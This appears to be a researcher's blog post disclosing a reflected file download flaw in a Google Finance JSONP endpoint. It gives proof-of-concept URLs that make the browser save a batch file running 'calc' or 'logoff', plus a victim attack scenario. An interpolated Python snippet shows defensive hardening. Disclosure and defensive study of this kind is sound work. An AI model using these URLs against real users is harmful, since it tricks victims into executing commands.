Found this vulnerability when auditing another client. With this RFD you don’t need to create a page to force the download.
The request for this Google JSON file already does this for us.
I noticed this request:
http://www.google.com/finance/info?q=ELI:ALTR&callback=?
Which returned the following information:
// [ { "id": "703655" ,"t" : "ALTR" ,"e" : "ELI" ,"l" : "4.71" ,"l_fix" : "4.71" ,"l_cur" : "€4.71" ,"s": "0" ,"ltt":"5:35PM GMT+1" ,"lt" : "Dec 15, 5:35PM GMT+1" ,"lt_dts" : "2015-12-15T17:35:40Z" ,"c" : "+0.31" ,"c_fix" : "0.31" ,"cp" : "7.14" ,"cp_fix" : "7.14" ,"ccol" : "chg" ,"pcls_fix" : "4.396" } ]
I wondered if that callback parameter could be manipulated. So I injected “calc” into the request:
http://www.google.com/finance/info?q=ELI:ALTR&callback=calc
Which returned the following information:
// calc([ { "id": "703655" ,"t" : "ALTR" ,"e" : "ELI" ,"l" : "4.71" ,"l_fix" : "4.71" ,"l_cur" : "€4.71" ,"s": "0" ,"ltt":"5:35PM GMT+1" ,"lt" : "Dec 15, 5:35PM GMT+1" ,"lt_dts" : "2015-12-15T17:35:40Z" ,"c" : "+0.31" ,"c_fix" : "0.31" ,"cp" : "7.14" ,"cp_fix" : "7.14" ,"ccol" : "chg" ,"pcls_fix" : "4.396" } ] );
Done! Got my injected Windows command reflected in this XHR response. Time to check if the URL is permissive:
http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=calc
Guess what? I got a URL that automatically shows the download dialog from Google with a batch file.
I tried successfully with the following browsers:
- Firefox latest version
- Opera latest version
- Internet Explorer 8 and 9
What are the limitations?
I noticed in my testing that most of the characters are sanitized, so it only lets you use one command, without spaces or arguments.
Proof-of-concept:
http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=calc
[when the batch is executed the Windows calculator opens]
http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=logoff
[when the batch is executed the system logs off the authenticated user]
Possible attack scenario:
- Attacker sends the URL – http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=logoff – to the victim.
- Victim downloads the file and executes it.
- After execution of the batch file it will log off the victim from the operating system.
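As an added example (my own code, not the author's and not Google's), here is a small Python model of the server-side hardening that breaks this RFD chain: serve the endpoint only on its exact path (so `/finance/info;setup.bat` gets a 404), accept only a plain JavaScript identifier as the callback, and pin the download name with a fixed `Content-Disposition` filename plus `X-Content-Type-Options: nosniff`. Note that identifier validation alone still admits `calc`, which is exactly what this post abuses, so the exact-path check and the pinned `.txt` filename are what actually remove the risk. The function names and the sample payload are assumptions for illustration.

```python
import json
import re
from typing import Any, Dict, Tuple

# Constructed sample payload shaped like the Google Finance quote shown above.
SAMPLE_QUOTE = [{"id": "703655", "t": "ALTR", "e": "ELI", "l": "4.71"}]

# Allow-list for a JSONP callback: a (dotted) JavaScript identifier and nothing else.
CALLBACK_RE = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]*(\.[A-Za-z_$][A-Za-z0-9_$]*)*$")
MAX_CALLBACK_LEN = 64

ENDPOINT_PATH = "/finance/info"          # hypothetical route, mirrors the URL in the post
PINNED_FILENAME = "finance-info.txt"     # inert extension; never derived from the URL


def is_safe_callback(name: str) -> bool:
    """True only for a plain identifier such as 'jQuery123' or 'app.cb'.
    This blocks separators and arguments, but a bare word like 'calc' still passes."""
    return len(name) <= MAX_CALLBACK_LEN and CALLBACK_RE.fullmatch(name) is not None


def path_is_exact(path: str) -> bool:
    """Reject path-parameter tricks such as '/finance/info;setup.bat' or '/finance/info/x.bat'."""
    return path == ENDPOINT_PATH


def build_jsonp_response(path: str, callback: str, data: Any) -> Tuple[int, Dict[str, str], str]:
    """Return (status, headers, body) for a hardened JSONP endpoint (hypothetical helper)."""
    if not path_is_exact(path):
        return 404, {"Content-Type": "text/plain"}, "not found"
    if not is_safe_callback(callback):
        return 400, {"Content-Type": "text/plain"}, "invalid callback"
    body = f"/**/{callback}({json.dumps(data)});"
    headers = {
        "Content-Type": "application/javascript; charset=utf-8",
        # Fixed filename: if a browser ever saves this response, it is a .txt, not a .bat.
        "Content-Disposition": f'attachment; filename="{PINNED_FILENAME}"',
        # Stop MIME sniffing so the body is never reinterpreted as another type.
        "X-Content-Type-Options": "nosniff",
    }
    return 200, headers, body


def download_filename(headers: Dict[str, str], url_path: str) -> str:
    """Name a browser would use when saving: pinned header if present, else last URL segment."""
    cd = headers.get("Content-Disposition", "")
    m = re.search(r'filename="([^"]+)"', cd)
    if m:
        return m.group(1)
    return url_path.rsplit("/", 1)[-1]


if __name__ == "__main__":
    # Walk the three requests from the post through the hardened handler.
    for path, cb in [(ENDPOINT_PATH, "?"), (ENDPOINT_PATH, "calc"), ("/finance/info;setup.bat", "calc")]:
        status, hdrs, body = build_jsonp_response(path, cb, SAMPLE_QUOTE)
        print(status, download_filename(hdrs, path), body[:40])
```

Running the block shows `callback=?` rejected with 400, the path-parameter variant rejected with 404, and the plain `callback=calc` request answered with a body that still contains `calc(` but would only ever be saved as `finance-info.txt`.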
I made a small video that illustrates my proof-of-concept:
Google decided that this issue has very little or no security impact. Personally, I don’t agree, but that’s my opinion 🙂
So this RFD is still unpatched. I hope they change their mind and fix this soon.